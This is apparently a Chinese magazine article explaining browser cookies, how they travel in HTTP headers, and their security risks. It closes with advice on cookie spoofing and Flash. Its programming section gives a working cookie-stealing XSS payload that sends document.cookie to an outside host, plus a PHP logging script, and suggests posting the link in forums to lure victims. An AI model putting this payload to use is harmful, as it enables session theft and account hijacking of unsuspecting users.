Cookie的傳遞流程及安全問題

　編者按：Cookie在英文中是小甜品的意思，而這個詞我們總能在瀏覽器中看到，食品怎麼會跟瀏覽器扯上關係呢？在你瀏覽以前登陸過的網站時可能會在網頁中出現：你好XX，感覺很親切，就好像是吃了一個小甜品一樣。 這其實是通過訪問你主機裡邊的一個檔案來實現的，因此這個檔案也就被稱為了Cookie。想全面瞭解Cookie嗎？看看下文吧！

　　一、瞭解Cookie 適用對象：初級讀者

　　Cookie是當你瀏覽某網站時，網站儲存在你機器上的一個小文字檔，它記錄了你的使用者ID，密碼、瀏覽過的網頁、停留的時間等資訊，當你再次來到該網站時，網站通過讀取Cookie，得知你的相關資訊，就可以做出相應的動作，如在頁面顯示歡迎你的標語，或者讓你不用輸入ID、密碼就直接登入等等。你可以在IE的“工具/Internet選項”的“常規”選項卡中，選擇“設定/查看檔案”，查看所有儲存到你電腦裡的Cookie。這些檔案通常是以user@domain格式命名的，user是你的本機使用者名，domain是所訪問的網站的網域名稱。如果你使用NetsCape瀏覽器，則存放在“C:/PROGRAMFILES/NETSCAPE/USERS/”裡面，與IE不同的是，NETSCAPE是使用一個Cookie 檔案記錄所有網站的Cookies。

　　為了保證上網安全我們需要對Cookie進行適當設定。開啟“工具/Internet選項”中的“隱私”選項卡（注意該設定只在IE6.0中存在，其他版本IE可以在“工具/Internet選項”的“安全”標籤中單擊“自訂層級”按鈕，進行簡單調整），調整Cookie的安全層級。通常情況，可以將滑塊調整到“中高”或者“高”的位置。多數的論壇網站需要使用Cookie資訊，如果你從來不去這些地方，可以將安全級調到“阻止所有Cookies”。如果只是為了禁止個別網站的Cookie，可以單擊“編輯”按鈕，將要屏蔽的網站添加到列表中。在“進階”按鈕選項中，你可以對第一方Cookie和第三方的Cookie進行設定，第一方Cookie是你正在瀏覽的網站的Cookie，第三方Cookie非正在瀏覽的網站發給你的Cookie，通常要對第三方Cookie選擇“拒絕”，1。你如果需要儲存Cookie，可以使用IE的“匯入匯出”功能，開啟“檔案/匯入匯出”，按提示操作即可。

　　Cookie中的內容大多數經過了加密處理，因此在我們看來只是一些毫無意義的字母數字組合，只有伺服器的CGI處理常式才知道它們真正的含義。通過一些軟體我們可以查看到更多的內容，使用Cookie Pal軟體查看到的Cookie資訊，2所示。它為我們提供了Server、Expires、Name、Value等選項的內容。其中，Server是儲存Cookie的網站，Expires記錄了Cookie的時間和生命期，Name和value欄位則是具體的資料（本報第10期第42版對該軟體有詳細介紹）。

　　二、Cookie的傳遞流程 適用對象：中級讀者

　　當在瀏覽器地址欄中鍵入了一個Web網站的URL，瀏覽器會向該Web網站發送一個讀取網頁的請求，並將結果在顯示器上顯示。這時該網頁在你的電腦上尋找Amazon網站設定的Cookie檔案，如果找到，瀏覽器會把Cookie檔案中的資料連同前面輸入的URL一同發送到Amazon伺服器。伺服器收到Cookie資料，就會在他的資料庫中檢索你的ID，你的購物記錄、個人喜好等資訊，並記錄下新的內容，增加到資料庫和Cookie檔案中去。如果沒有檢測到Cookie或者你的Cookie資訊與資料庫中的資訊不符合，則說明你是第一次瀏覽該網站，伺服器的CGI程式將為你建立新的ID資訊，並儲存到資料庫中。

　　Cookie是利用了網頁代碼中的HTTP頭資訊進行傳遞的，瀏覽器的每一次網頁請求，都可以伴隨Cookie傳遞，例如，瀏覽器的開啟或重新整理網頁操作。伺服器將Cookie添加到網頁的HTTP頭資訊中，伴隨網頁資料傳回到你的瀏覽器，瀏覽器會根據你電腦中的Cookie設定選擇是否儲存這些資料。如果瀏覽器不允許Cookie儲存，則關掉瀏覽器後，這些資料就消失。Cookie在電腦上儲存的時間是不一樣的，這些都是由伺服器的設定不同決定得。Cookie有一個Expires（有效期間）屬性，這個屬性決定了Cookie的儲存時間，伺服器可以通過設定Expires欄位的數值，來改變Cookie的儲存時間。如果不設定該屬性，那麼Cookie只在瀏覽網頁期間有效，關閉瀏覽器，這些Cookie自動消失，絕大多數網站屬於這種情況。通常情況下，Cookie包含Server、Expires、Name、Value這幾個欄位，其中對伺服器有用的只是Name和Value欄位，Expires等欄位的內容僅僅是為了告訴瀏覽器如何處理這些Cookies。

　　三、Cookie的編程實現 適用對象：進階讀者

　　多數網頁程式設計語言都提供了對Cookie的支援。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些物件導向的程式設計語言中，對Cookie的編程利用基本上是相似的，大體過程為：先建立一個Cookie對象（Object），然後利用控制函數對Cookie進行賦值、讀取、寫入等操作。那麼如何通過代碼來擷取其他使用者Cookie中的敏感資訊？下面進行簡單的介紹。

　　該方法主要有兩步，首先要定位你需要收集Cookie的網站，並對其進行分析，並構造URL；然後編製收集Cookie的PHP代碼，並將其放到你可以控制的網站上，當不知情者單擊了你構造的URL後可以執行該PHP代碼。下面我們看具體的實現過程。

　　1.分析並構造URL

　　首先開啟我們要收集Cookie的網站，這裡假設是http://www.XXX.net，登陸網站輸入使用者名稱“<A1>”（不含引號），對資料進行分析抓包，得到形如“http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6”的代碼，將“<A1>”更換為“<script>alert(document.cookie)</script>”再試；如果執行成功，就開始構造URL：“http://www.XXX.net/txl/login/login.pl?username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能夠控制的某台主機上的一個指令碼。需要注意的是“%2B”為符號“+”的URL編碼，因為“+”將被作為空白格處理。該URL就可以在論壇中發布，誘使別人點擊了。

　　2.編製PHP指令碼

　　該指令碼的作用就是收集Cookie檔案，具體內容如下：

　　　　<?php
　　　　$info = getenv("QUERY_STRING");
　　　　if ($info) {
　　　　$fp = fopen("info.txt","a");
　　 fwrite($fp,$info."/n");
　　 fclose($fp);
　　　　}
　　　　header("Location: http://www.XXX.net");
　　　　?>

　　四、Cookie的安全問題 適用對象：所有希望上網安全的讀者

　　1.Cookie欺騙

　　Cookie記錄著使用者的帳戶ID、密碼之類的資訊，如果在網上傳遞，通常使用的是MD5方法加密。這樣經過加密處理後的資訊，即使被網路上一些別有用心的人截獲，也看不懂，因為他看到的只是一些無意義的字母和數字。然而，現在遇到的問題是，截獲Cookie的人不需要知道這些字串的含義，他們只要把別人的Cookie向伺服器提交，並且能夠通過驗證，他們就可以冒充受害人的身份，登陸網站。這種方法叫做Cookie欺騙。Cookie欺騙實現的前提條件是伺服器的驗證程式存在漏洞，並且冒充者要獲得被冒充的人的Cookie資訊。目前網站的驗證程式要排除所有非法登入是非常困難的，例如，編寫驗證程式使用的語言可能存在漏洞。而且要獲得別人Cookie是很容易的，用支援Cookie的語言編寫一小段代碼就可以實現（具體方法見三），只要把這段代碼放到網路裡，那麼所有人的Cookie都能夠被收集。如果一個論壇允許HTML代碼或者允許使用Flash標籤就可以利用這些技術收集Cookie的代碼放到論壇裡，然後給文章取一個迷人的主題，寫上有趣的內容，很快就可以收集到大量的Cookie。在論壇上，有許多人的密碼就被這種方法盜去的。至於如何防範，目前還沒有特效藥，我們也只能使用通常的防護方法，不要在論壇裡使用重要的密碼，也不要使用IE自動儲存密碼的功能，以及盡量不登陸不瞭解底細的網站。

　　2.Flash的代碼隱患

　　Flash中有一個getURL（）函數，Flash可以利用這個函數自動開啟指定的網頁。因此它可能把你引向一個包含惡意代碼的網站。打個比方，當你在自己電腦上欣賞精美的Flash動畫時，動畫幀裡的代碼可能已經悄悄地連上網，並開啟了一個極小的包含有特殊代碼的頁面。這個頁面可以收集你的Cookie、也可以做一些其他的事情，比如在你的機器上種植木馬甚至格式化你的硬碟等等。對於Flash的這種行為，網站是無法禁止的，因為這是Flash檔案的內部行為。我們所能做到的，如果是在本地瀏覽盡量開啟防火牆，如果防火牆提示的向外發送的資料包並不為你知悉，最好禁止。如果是在Internet上欣賞，最好找一些知名的大網站。